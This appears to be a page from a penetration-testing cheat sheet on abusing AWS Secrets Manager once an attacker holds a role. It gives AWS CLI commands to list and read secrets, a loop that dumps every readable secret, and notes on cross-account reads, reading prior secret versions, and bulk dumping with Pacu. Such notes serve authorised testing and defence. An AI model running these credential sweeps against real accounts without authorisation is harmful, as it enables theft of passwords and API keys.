Secrets Manager stores credentials for applications to fetch at runtime, so secretsmanager:GetSecretValue is a read straight into the account's passwords, API keys, and connection strings. The permission is frequently granted broadly to application roles, which makes it a prime target once you hold such a role.
Listing and reading#
aws secretsmanager list-secrets --query 'SecretList[].[Name,ARN]' --output text
aws secretsmanager get-secret-value --secret-id <name-or-arn> \
--query SecretString --output text
Sweeping everything readable#
for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text); do
echo "== $s =="
aws secretsmanager get-secret-value --secret-id "$s" --query SecretString --output text 2>/dev/null
done
Exploitation notes#
- Reading a secret does not rotate it, so recovered database and third-party credentials keep working.
- Resource policies on a secret can allow cross-account reads; check
get-resource-policywhen a role spans accounts. - A
VersionStageofAWSPREVIOUSoften still returns the prior value, useful when the current one was rotated after exposure.
Tools#
- AWS CLI (
secretsmanager get-secret-value). - Pacu (
secrets__enum): bulk-dump Secrets Manager and Parameter Store.